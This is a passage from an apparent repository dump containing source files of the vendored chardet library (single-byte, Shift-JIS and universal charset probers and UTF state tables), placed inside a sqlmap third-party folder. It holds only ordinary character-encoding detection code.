MachineState.ITS_ME,MachineState.ITS_ME,     6,     6,     6,     6,MachineState.ERROR,MachineState.ERROR,#10-17\n          6,     6,     6,     6,     6,MachineState.ITS_ME,     6,     6,#18-1f\n          6,     6,     6,     6,     5,     7,     7,MachineState.ERROR,#20-27\n          5,     8,     6,     6,MachineState.ERROR,     6,     6,     6,#28-2f\n          6,     6,     6,     6,MachineState.ERROR,MachineState.ERROR,MachineState.START,MachineState.START #30-37\n)\n\nUCS2BE_CHAR_LEN_TABLE = (2, 2, 2, 0, 2, 2)\n\nUCS2BE_SM_MODEL = {'class_table': UCS2BE_CLS,\n                   'class_factor': 6,\n                   'state_table': UCS2BE_ST,\n                   'char_len_table': UCS2BE_CHAR_LEN_TABLE,\n                   'name': 'UTF-16BE'}\n\n# UCS2-LE\n\nUCS2LE_CLS = (\n    0,0,0,0,0,0,0,0,  # 00 - 07\n    0,0,1,0,0,2,0,0,  # 08 - 0f\n    0,0,0,0,0,0,0,0,  # 10 - 17\n    0,0,0,3,0,0,0,0,  # 18 - 1f\n    0,0,0,0,0,0,0,0,  # 20 - 27\n    0,3,3,3,3,3,0,0,  # 28 - 2f\n    0,0,0,0,0,0,0,0,  # 30 - 37\n    0,0,0,0,0,0,0,0,  # 38 - 3f\n    0,0,0,0,0,0,0,0,  # 40 - 47\n    0,0,0,0,0,0,0,0,  # 48 - 4f\n    0,0,0,0,0,0,0,0,  # 50 - 57\n    0,0,0,0,0,0,0,0,  # 58 - 5f\n    0,0,0,0,0,0,0,0,  # 60 - 67\n    0,0,0,0,0,0,0,0,  # 68 - 6f\n    0,0,0,0,0,0,0,0,  # 70 - 77\n    0,0,0,0,0,0,0,0,  # 78 - 7f\n    0,0,0,0,0,0,0,0,  # 80 - 87\n    0,0,0,0,0,0,0,0,  # 88 - 8f\n    0,0,0,0,0,0,0,0,  # 90 - 97\n    0,0,0,0,0,0,0,0,  # 98 - 9f\n    0,0,0,0,0,0,0,0,  # a0 - a7\n    0,0,0,0,0,0,0,0,  # a8 - af\n    0,0,0,0,0,0,0,0,  # b0 - b7\n    0,0,0,0,0,0,0,0,  # b8 - bf\n    0,0,0,0,0,0,0,0,  # c0 - c7\n    0,0,0,0,0,0,0,0,  # c8 - cf\n    0,0,0,0,0,0,0,0,  # d0 - d7\n    0,0,0,0,0,0,0,0,  # d8 - df\n    0,0,0,0,0,0,0,0,  # e0 - e7\n    0,0,0,0,0,0,0,0,  # e8 - ef\n    0,0,0,0,0,0,0,0,  # f0 - f7\n    0,0,0,0,0,0,4,5   # f8 - ff\n)\n\nUCS2LE_ST = (\n          6,     6,     7,     6,     4,     3,MachineState.ERROR,MachineState.ERROR,#00-07\n     MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,#08-0f\n     MachineState.ITS_ME,MachineState.ITS_ME,     5,     5,     5,MachineState.ERROR,MachineState.ITS_ME,MachineState.ERROR,#10-17\n          5,     5,     5,MachineState.ERROR,     5,MachineState.ERROR,     6,     6,#18-1f\n          7,     6,     8,     8,     5,     5,     5,MachineState.ERROR,#20-27\n          5,     5,     5,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,     5,     5,#28-2f\n          5,     5,     5,MachineState.ERROR,     5,MachineState.ERROR,MachineState.START,MachineState.START #30-37\n)\n\nUCS2LE_CHAR_LEN_TABLE = (2, 2, 2, 2, 2, 2)\n\nUCS2LE_SM_MODEL = {'class_table': UCS2LE_CLS,\n                 'class_factor': 6,\n                 'state_table': UCS2LE_ST,\n                 'char_len_table': UCS2LE_CHAR_LEN_TABLE,\n                 'name': 'UTF-16LE'}\n\n# UTF-8\n\nUTF8_CLS = (\n    1,1,1,1,1,1,1,1,  # 00 - 07  #allow 0x00 as a legal value\n    1,1,1,1,1,1,0,0,  # 08 - 0f\n    1,1,1,1,1,1,1,1,  # 10 - 17\n    1,1,1,0,1,1,1,1,  # 18 - 1f\n    1,1,1,1,1,1,1,1,  # 20 - 27\n    1,1,1,1,1,1,1,1,  # 28 - 2f\n    1,1,1,1,1,1,1,1,  # 30 - 37\n    1,1,1,1,1,1,1,1,  # 38 - 3f\n    1,1,1,1,1,1,1,1,  # 40 - 47\n    1,1,1,1,1,1,1,1,  # 48 - 4f\n    1,1,1,1,1,1,1,1,  # 50 - 57\n    1,1,1,1,1,1,1,1,  # 58 - 5f\n    1,1,1,1,1,1,1,1,  # 60 - 67\n    1,1,1,1,1,1,1,1,  # 68 - 6f\n    1,1,1,1,1,1,1,1,  # 70 - 77\n    1,1,1,1,1,1,1,1,  # 78 - 7f\n    2,2,2,2,3,3,3,3,  # 80 - 87\n    4,4,4,4,4,4,4,4,  # 88 - 8f\n    4,4,4,4,4,4,4,4,  # 90 - 97\n    4,4,4,4,4,4,4,4,  # 98 - 9f\n    5,5,5,5,5,5,5,5,  # a0 - a7\n    5,5,5,5,5,5,5,5,  # a8 - af\n    5,5,5,5,5,5,5,5,  # b0 - b7\n    5,5,5,5,5,5,5,5,  # b8 - bf\n    0,0,6,6,6,6,6,6,  # c0 - c7\n    6,6,6,6,6,6,6,6,  # c8 - cf\n    6,6,6,6,6,6,6,6,  # d0 - d7\n    6,6,6,6,6,6,6,6,  # d8 - df\n    7,8,8,8,8,8,8,8,  # e0 - e7\n    8,8,8,8,8,9,8,8,  # e8 - ef\n    10,11,11,11,11,11,11,11,  # f0 - f7\n    12,13,13,13,14,15,0,0    # f8 - ff\n)\n\nUTF8_ST = (\n    MachineState.ERROR,MachineState.START,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,     12,   10,#00-07\n         9,     11,     8,     7,     6,     5,     4,    3,#08-0f\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#10-17\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#18-1f\n    MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,#20-27\n    MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,#28-2f\n    MachineState.ERROR,MachineState.ERROR,     5,     5,     5,     5,MachineState.ERROR,MachineState.ERROR,#30-37\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#38-3f\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,     5,     5,     5,MachineState.ERROR,MachineState.ERROR,#40-47\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#48-4f\n    MachineState.ERROR,MachineState.ERROR,     7,     7,     7,     7,MachineState.ERROR,MachineState.ERROR,#50-57\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#58-5f\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,     7,     7,MachineState.ERROR,MachineState.ERROR,#60-67\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#68-6f\n    MachineState.ERROR,MachineState.ERROR,     9,     9,     9,     9,MachineState.ERROR,MachineState.ERROR,#70-77\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#78-7f\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,     9,MachineState.ERROR,MachineState.ERROR,#80-87\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#88-8f\n    MachineState.ERROR,MachineState.ERROR,    12,    12,    12,    12,MachineState.ERROR,MachineState.ERROR,#90-97\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#98-9f\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,    12,MachineState.ERROR,MachineState.ERROR,#a0-a7\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#a8-af\n    MachineState.ERROR,MachineState.ERROR,    12,    12,    12,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#b0-b7\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#b8-bf\n    MachineState.ERROR,MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.ERROR,MachineState.ERROR,#c0-c7\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR #c8-cf\n)\n\nUTF8_CHAR_LEN_TABLE = (0, 1, 0, 0, 0, 0, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6)\n\nUTF8_SM_MODEL = {'class_table': UTF8_CLS,\n                 'class_factor': 16,\n                 'state_table': UTF8_ST,\n                 'char_len_table': UTF8_CHAR_LEN_TABLE,\n                 'name': 'UTF-8'}\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/sbcharsetprober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Universal charset detector code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 2001\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#   Shy Shalom - original C code\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .charsetprober import CharSetProber\nfrom .enums import CharacterCategory, ProbingState, SequenceLikelihood\n\n\nclass SingleByteCharSetProber(CharSetProber):\n    SAMPLE_SIZE = 64\n    SB_ENOUGH_REL_THRESHOLD = 1024  #  0.25 * SAMPLE_SIZE^2\n    POSITIVE_SHORTCUT_THRESHOLD = 0.95\n    NEGATIVE_SHORTCUT_THRESHOLD = 0.05\n\n    def __init__(self, model, reversed=False, name_prober=None):\n        super(SingleByteCharSetProber, self).__init__()\n        self._model = model\n        # TRUE if we need to reverse every pair in the model lookup\n        self._reversed = reversed\n        # Optional auxiliary prober for name decision\n        self._name_prober = name_prober\n        self._last_order = None\n        self._seq_counters = None\n        self._total_seqs = None\n        self._total_char = None\n        self._freq_char = None\n        self.reset()\n\n    def reset(self):\n        super(SingleByteCharSetProber, self).reset()\n        # char order of last character\n        self._last_order = 255\n        self._seq_counters = [0] * SequenceLikelihood.get_num_categories()\n        self._total_seqs = 0\n        self._total_char = 0\n        # characters that fall in our sampling range\n        self._freq_char = 0\n\n    @property\n    def charset_name(self):\n        if self._name_prober:\n            return self._name_prober.charset_name\n        else:\n            return self._model['charset_name']\n\n    @property\n    def language(self):\n        if self._name_prober:\n            return self._name_prober.language\n        else:\n            return self._model.get('language')\n\n    def feed(self, byte_str):\n        if not self._model['keep_english_letter']:\n            byte_str = self.filter_international_words(byte_str)\n        if not byte_str:\n            return self.state\n        char_to_order_map = self._model['char_to_order_map']\n        for i, c in enumerate(byte_str):\n            # XXX: Order is in range 1-64, so one would think we want 0-63 here,\n            #      but that leads to 27 more test failures than before.\n            order = char_to_order_map[c]\n            # XXX: This was SYMBOL_CAT_ORDER before, with a value of 250, but\n            #      CharacterCategory.SYMBOL is actually 253, so we use CONTROL\n            #      to make it closer to the original intent. The only difference\n            #      is whether or not we count digits and control characters for\n            #      _total_char purposes.\n            if order < CharacterCategory.CONTROL:\n                self._total_char += 1\n            if order < self.SAMPLE_SIZE:\n                self._freq_char += 1\n                if self._last_order < self.SAMPLE_SIZE:\n                    self._total_seqs += 1\n                    if not self._reversed:\n                        i = (self._last_order * self.SAMPLE_SIZE) + order\n                        model = self._model['precedence_matrix'][i]\n                    else:  # reverse the order of the letters in the lookup\n                        i = (order * self.SAMPLE_SIZE) + self._last_order\n                        model = self._model['precedence_matrix'][i]\n                    self._seq_counters[model] += 1\n            self._last_order = order\n\n        charset_name = self._model['charset_name']\n        if self.state == ProbingState.DETECTING:\n            if self._total_seqs > self.SB_ENOUGH_REL_THRESHOLD:\n                confidence = self.get_confidence()\n                if confidence > self.POSITIVE_SHORTCUT_THRESHOLD:\n                    self.logger.debug('%s confidence = %s, we have a winner',\n                                      charset_name, confidence)\n                    self._state = ProbingState.FOUND_IT\n                elif confidence < self.NEGATIVE_SHORTCUT_THRESHOLD:\n                    self.logger.debug('%s confidence = %s, below negative '\n                                      'shortcut threshhold %s', charset_name,\n                                      confidence,\n                                      self.NEGATIVE_SHORTCUT_THRESHOLD)\n                    self._state = ProbingState.NOT_ME\n\n        return self.state\n\n    def get_confidence(self):\n        r = 0.01\n        if self._total_seqs > 0:\n            r = ((1.0 * self._seq_counters[SequenceLikelihood.POSITIVE]) /\n                 self._total_seqs / self._model['typical_positive_ratio'])\n            r = r * self._freq_char / self._total_char\n            if r >= 1.0:\n                r = 0.99\n        return r\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/sbcsgroupprober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Universal charset detector code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 2001\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#   Shy Shalom - original C code\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .charsetgroupprober import CharSetGroupProber\nfrom .sbcharsetprober import SingleByteCharSetProber\nfrom .langcyrillicmodel import (Win1251CyrillicModel, Koi8rModel,\n                                Latin5CyrillicModel, MacCyrillicModel,\n                                Ibm866Model, Ibm855Model)\nfrom .langgreekmodel import Latin7GreekModel, Win1253GreekModel\nfrom .langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel\n# from .langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel\nfrom .langthaimodel import TIS620ThaiModel\nfrom .langhebrewmodel import Win1255HebrewModel\nfrom .hebrewprober import HebrewProber\nfrom .langturkishmodel import Latin5TurkishModel\n\n\nclass SBCSGroupProber(CharSetGroupProber):\n    def __init__(self):\n        super(SBCSGroupProber, self).__init__()\n        self.probers = [\n            SingleByteCharSetProber(Win1251CyrillicModel),\n            SingleByteCharSetProber(Koi8rModel),\n            SingleByteCharSetProber(Latin5CyrillicModel),\n            SingleByteCharSetProber(MacCyrillicModel),\n            SingleByteCharSetProber(Ibm866Model),\n            SingleByteCharSetProber(Ibm855Model),\n            SingleByteCharSetProber(Latin7GreekModel),\n            SingleByteCharSetProber(Win1253GreekModel),\n            SingleByteCharSetProber(Latin5BulgarianModel),\n            SingleByteCharSetProber(Win1251BulgarianModel),\n            # TODO: Restore Hungarian encodings (iso-8859-2 and windows-1250)\n            #       after we retrain model.\n            # SingleByteCharSetProber(Latin2HungarianModel),\n            # SingleByteCharSetProber(Win1250HungarianModel),\n            SingleByteCharSetProber(TIS620ThaiModel),\n            SingleByteCharSetProber(Latin5TurkishModel),\n        ]\n        hebrew_prober = HebrewProber()\n        logical_hebrew_prober = SingleByteCharSetProber(Win1255HebrewModel,\n                                                        False, hebrew_prober)\n        visual_hebrew_prober = SingleByteCharSetProber(Win1255HebrewModel, True,\n                                                       hebrew_prober)\n        hebrew_prober.set_model_probers(logical_hebrew_prober, visual_hebrew_prober)\n        self.probers.extend([hebrew_prober, logical_hebrew_prober,\n                             visual_hebrew_prober])\n\n        self.reset()\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/sjisprober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is mozilla.org code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .mbcharsetprober import MultiByteCharSetProber\nfrom .codingstatemachine import CodingStateMachine\nfrom .chardistribution import SJISDistributionAnalysis\nfrom .jpcntx import SJISContextAnalysis\nfrom .mbcssm import SJIS_SM_MODEL\nfrom .enums import ProbingState, MachineState\n\n\nclass SJISProber(MultiByteCharSetProber):\n    def __init__(self):\n        super(SJISProber, self).__init__()\n        self.coding_sm = CodingStateMachine(SJIS_SM_MODEL)\n        self.distribution_analyzer = SJISDistributionAnalysis()\n        self.context_analyzer = SJISContextAnalysis()\n        self.reset()\n\n    def reset(self):\n        super(SJISProber, self).reset()\n        self.context_analyzer.reset()\n\n    @property\n    def charset_name(self):\n        return self.context_analyzer.charset_name\n\n    @property\n    def language(self):\n        return \"Japanese\"\n\n    def feed(self, byte_str):\n        for i in range(len(byte_str)):\n            coding_state = self.coding_sm.next_state(byte_str[i])\n            if coding_state == MachineState.ERROR:\n                self.logger.debug('%s %s prober hit error at byte %s',\n                                  self.charset_name, self.language, i)\n                self._state = ProbingState.NOT_ME\n                break\n            elif coding_state == MachineState.ITS_ME:\n                self._state = ProbingState.FOUND_IT\n                break\n            elif coding_state == MachineState.START:\n                char_len = self.coding_sm.get_current_charlen()\n                if i == 0:\n                    self._last_char[1] = byte_str[0]\n                    self.context_analyzer.feed(self._last_char[2 - char_len:],\n                                               char_len)\n                    self.distribution_analyzer.feed(self._last_char, char_len)\n                else:\n                    self.context_analyzer.feed(byte_str[i + 1 - char_len:i + 3\n                                                        - char_len], char_len)\n                    self.distribution_analyzer.feed(byte_str[i - 1:i + 1],\n                                                    char_len)\n\n        self._last_char[0] = byte_str[-1]\n\n        if self.state == ProbingState.DETECTING:\n            if (self.context_analyzer.got_enough_data() and\n               (self.get_confidence() > self.SHORTCUT_THRESHOLD)):\n                self._state = ProbingState.FOUND_IT\n\n        return self.state\n\n    def get_confidence(self):\n        context_conf = self.context_analyzer.get_confidence()\n        distrib_conf = self.distribution_analyzer.get_confidence()\n        return max(context_conf, distrib_conf)\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/universaldetector.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Universal charset detector code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 2001\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#   Shy Shalom - original C code\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\"\"\"\nModule containing the UniversalDetector detector class, which is the primary\nclass a user of ``chardet`` should use.\n\n:author: Mark Pilgrim (initial port to Python)\n:author: Shy Shalom (original C code)\n:author: Dan Blanchard (major refactoring for 3.0)\n:author: Ian Cordasco\n\"\"\"\n\n\nimport codecs\nimport logging\nimport re\n\nfrom .charsetgroupprober import CharSetGroupProber\nfrom .enums import InputState, LanguageFilter, ProbingState\nfrom .escprober import EscCharSetProber\nfrom .latin1prober import Latin1Prober\nfrom .mbcsgroupprober import MBCSGroupProber\nfrom .sbcsgroupprober import SBCSGroupProber\n\n\nclass UniversalDetector(object):\n    \"\"\"\n    The ``UniversalDetector`` class underlies the ``chardet.detect`` function\n    and coordinates all of the different charset probers.\n\n    To get a ``dict`` containing an encoding and its confidence, you can simply\n    run:\n\n    .. code::\n\n            u = UniversalDetector()\n            u.feed(some_bytes)\n            u.close()\n            detected = u.result\n\n    \"\"\"\n\n    MINIMUM_THRESHOLD = 0.20\n    HIGH_BYTE_DETECTOR = re.compile(b'[\\x80-\\xFF]')\n    ESC_DETECTOR = re.compile(b'(\\033|~{)')\n    WIN_BYTE_DETECTOR = re.compile(b'[\\x80-\\x9F]')\n    ISO_WIN_MAP = {'iso-8859-1': 'Windows-1252',\n                   'iso-8859-2': 'Windows-1250',\n                   'iso-8859-5': 'Windows-1251',\n                   'iso-8859-6': 'Windows-1256',\n                   'iso-8859-7': 'Windows-1253',\n                   'iso-8859-8': 'Windows-1255',\n                   'iso-8859-9': 'Windows-1254',\n                   'iso-8859-13': 'Windows-1257'}\n\n    def __init__(self, lang_filter=LanguageFilter.ALL):\n        self._esc_charset_prober = None\n        self._charset_probers = []\n        self.result = None\n        self.done = None\n        self._got_data = None\n        self._input_state = None\n        self._last_char = None\n        self.lang_filter = lang_filter\n        self.logger = logging.getLogger(__name__)\n        self._has_win_bytes = None\n        self.reset()\n\n    def reset(self):\n        \"\"\"\n        Reset the UniversalDetector and all of its probers back to their\n        initial states.  This is called by ``__init__``, so you only need to\n        call this directly in between analyses of different documents.\n        \"\"\"\n        self.result = {'encoding': None, 'confidence': 0.0, 'language': None}\n        self.done = False\n        self._got_data = False\n        self._has_win_bytes = False\n        self._input_state = InputState.PURE_ASCII\n        self._last_char = b''\n        if self._esc_charset_prober:\n            self._esc_charset_prober.reset()\n        for prober in self._charset_probers:\n            prober.reset()\n\n    def feed(self, byte_str):\n        \"\"\"\n        Takes a chunk of a document and feeds it through all of the relevant\n        charset probers.\n\n        After calling ``feed``, you can check the value of the ``done``\n        attribute to see if you need to continue feeding the\n        ``UniversalDetector`` more data, or if it has made a prediction\n        (in the ``result`` attribute).\n\n        .. note::\n           You should always call ``close`` when you're done feeding in your\n           document if ``done`` is not already ``True``.\n        \"\"\"\n        if self.done:\n            return\n\n        if not len(byte_str):\n            return\n\n        if not isinstance(byte_str, bytearray):\n            byte_str = bytearray(byte_str)\n\n        # First check for known BOMs, since these are guaranteed to be correct\n        if not self._got_data:\n            # If the data starts with BOM, we know it is UTF\n            if byte_str.startswith(codecs.BOM_UTF8):\n                # EF BB BF  UTF-8 with BOM\n                self.result = {'encoding': \"UTF-8-SIG\",\n                               'confidence': 1.0,\n                               'language': ''}\n            elif byte_str.startswith((codecs.BOM_UTF32_LE,\n                                      codecs.BOM_UTF32_BE)):\n                # FF FE 00 00  UTF-32, little-endian BOM\n                # 00 00 FE FF  UTF-32, big-endian BOM\n                self.result = {'encoding': \"UTF-32\",\n                               'confidence': 1.0,\n                               'language': ''}\n            elif byte_str.startswith(b'\\xFE\\xFF\\x00\\x00'):\n                # FE FF 00 00  UCS-4, unusual octet order BOM (3412)\n                self.result = {'encoding': \"X-ISO-10646-UCS-4-3412\",\n                               'confidence': 1.0,\n                               'language': ''}\n            elif byte_str.startswith(b'\\x00\\x00\\xFF\\xFE'):\n                # 00 00 FF FE  UCS-4, unusual octet order BOM (2143)\n                self.result = {'encoding': \"X-ISO-10646-UCS-4-2143\",\n                               'confidence': 1.0,\n                               'language': ''}\n            elif byte_str.startswith((codecs.BOM_LE, codecs.BOM_BE)):\n                # FF FE  UTF-16, little endian BOM\n                # FE FF  UTF-16, big endian BOM\n                self.result = {'encoding': \"UTF-16\",\n                               'confidence': 1.0,\n                               'language': ''}\n\n            self._got_data = True\n            if self.result['encoding'] is not None:\n                self.done = True\n                return\n\n        # If none of those matched and we've only see ASCII so far, check\n        # for high bytes and escape sequences\n        if self._input_state == InputState.PURE_ASCII:\n            if self.HIGH_BYTE_DETECTOR.search(byte_str):\n                self._input_state = InputState.HIGH_BYTE\n            elif self._input_state == InputState.PURE_ASCII and \\\n                    self.ESC_DETECTOR.search(self._last_char + byte_str):\n                self._input_state = InputState.ESC_ASCII\n\n        self._last_char = byte_str[-1:]\n\n        # If we've seen escape sequences, use the EscCharSetProber, which\n        # uses a simple state machine to check for known escape sequences in\n        # HZ and ISO-2022 encodings, since those are the only encodings that\n        # use such sequences.\n        if self._input_state == InputState.ESC_ASCII:\n            if not self._esc_charset_prober:\n                self._esc_charset_prober = EscCharSetProber(self.lang_filter)\n            if self._esc_charset_prober.feed(byte_str) == ProbingState.FOUND_IT:\n                self.result = {'encoding':\n                               self._esc_charset_prober.charset_name,\n                               'confidence':\n                               self._esc_charset_prober.get_confidence(),\n                               'language':\n                               self._esc_charset_prober.language}\n                self.done = True\n        # If we've seen high bytes (i.e., those with values greater than 127),\n        # we need to do more complicated checks using all our multi-byte and\n        # single-byte probers that are left.  The single-byte probers\n        # use character bigram distributions to determine the encoding, whereas\n        # the multi-byte probers use a combination of character unigram and\n        # bigram distributions.\n        elif self._input_state == InputState.HIGH_BYTE:\n            if not self._charset_probers:\n                self._charset_probers = [MBCSGroupProber(self.lang_filter)]\n                # If we're checking non-CJK encodings, use single-byte prober\n                if self.lang_filter & LanguageFilter.NON_CJK:\n                    self._charset_probers.append(SBCSGroupProber())\n                self._charset_probers.append(Latin1Prober())\n            for prober in self._charset_probers:\n                if prober.feed(byte_str) == ProbingState.FOUND_IT:\n                    self.result = {'encoding': prober.charset_name,\n                                   'confidence': prober.get_confidence(),\n                                   'language': prober.language}\n                    self.done = True\n                    break\n            if self.WIN_BYTE_DETECTOR.search(byte_str):\n                self._has_win_bytes = True\n\n    def close(self):\n        \"\"\"\n        Stop analyzing the current document and come up with a final\n        prediction.\n\n        :returns:  The ``result`` attribute, a ``dict`` with the keys\n                   `encoding`, `confidence`, and `language`.\n        \"\"\"\n        # Don't bother with checks if we're already done\n        if self.done:\n            return self.result\n        self.done = True\n\n        if not self._got_data:\n            self.logger.debug('no data received!')\n\n        # Default to ASCII if it is all we've seen so far\n        elif self._input_state == InputState.PURE_ASCII:\n            self.result = {'encoding': 'ascii',\n                           'confidence': 1.0,\n                           'language': ''}\n\n        # If we have seen non-ASCII, return the best that met MINIMUM_THRESHOLD\n        elif self._input_state == InputState.HIGH_BYTE:\n            prober_confidence = None\n            max_prober_confidence = 0.0\n            max_prober = None\n            for prober in self._charset_probers:\n                if not prober:\n                    continue\n                prober_confidence = prober.get_confidence()\n                if prober_confidence > max_prober_confidence:\n                    max_prober_confidence = prober_confidence\n                    max_prober = prober\n            if max_prober and (max_prober_confidence > self.MINIMUM_THRESHOLD):\n                charset_name = max_prober.charset_name\n                lower_charset_name = max_prober.charset_name.lower()\n                confidence = max_prober.get_confidence()\n                # Use Windows encoding name instead of ISO-8859 if we saw any\n                # extra Windows-specific bytes\n                if lower_charset_name.startswith('iso-8859'):\n                    if self._has_win_bytes:\n                        charset_name = self.ISO_WIN_MAP.get(lower_charset_name,\n                                                            charset_name)\n                self.result = {'encoding': charset_name,\n                               'confidence': confidence,\n                               'language': max_prober.language}\n\n        # Log all prober confidences if none met MINIMUM_THRESHOLD\n        if self.logger.getEffectiveLevel() == logging.DEBUG:\n            if self.result['encoding'] is None:\n                self.logger.debug('no probers hit minimum threshold')\n                for group_prober in self._charset_probers:\n                    if not group_prober:\n                        continue\n                    if isinstance(group_prober, CharSetGroupProber):\n                        for prober in group_prober.probers:\n                            self.logger.debug('%s %s confidence = %s',\n                                              prober.charset_name,\n                                              prober.language,\n                                              prober.get_confidence())\n                    else:\n                        self.logger.debug('%s %s confidence = %s',\n                                          prober.charset_name,\n                                          prober.language,\n              